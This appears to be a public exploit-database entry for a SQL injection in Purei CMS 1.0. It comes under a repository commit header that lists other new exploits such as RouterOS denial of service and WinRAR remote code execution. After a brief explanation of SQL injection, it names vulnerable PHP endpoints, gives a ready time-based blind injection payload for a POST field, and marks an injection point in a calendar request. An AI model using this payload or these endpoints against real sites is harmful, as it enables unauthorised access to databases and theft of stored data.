e791587e41
10 changes to exploits/shellcodes/ghdb RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure Dell Security Management Server <1.9.0 - Local Privilege Escalation Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) Broken Access Control - on NodeBB v3.6.7 liveSite Version 2019.1 - Remote Code Execution Purei CMS 1.0 - SQL Injection Workout Journal App 1.0 - Stored XSS WinRAR version 6.22 - Remote Code Execution via ZIP archive
34 lines
No EOL
1.2 KiB
Text
34 lines
No EOL
1.2 KiB
Text
# Exploit Title: Purei CMS 1.0 - SQL Injection
|
|
# Date: [27-03-2024]
|
|
# Exploit Author: [Number 7]
|
|
# Vendor Homepage: [purei.com]
|
|
# Version: [1.0]
|
|
# Tested on: [Linux]
|
|
____________________________________________________________________________________
|
|
|
|
Introduction:
|
|
An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation
|
|
of user input. Such an injection transpires when web applications accept user input directly inserted
|
|
into an SQL statement without effectively filtering out hazardous characters.
|
|
|
|
This could jeopardize the integrity of your database or reveal sensitive information.
|
|
____________________________________________________________________________________
|
|
|
|
Time-Based Blind SQL Injection:
|
|
Vulnerable files:
|
|
http://localhost/includes/getAllParks.php
|
|
http://localhost/includes/getSearchMap.php
|
|
|
|
make a POST request with the value of the am input set to :
|
|
|
|
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
|
|
|
|
make sure to url encode the inputs.
|
|
SQL injection:
|
|
Method: POST REQUEST
|
|
|
|
Vunerable file:
|
|
|
|
/includes/events-ajax.php?action=getMonth
|
|
data for the POST req:
|
|
month=3&type=&year=2024&cal_id=1[Inject Here] |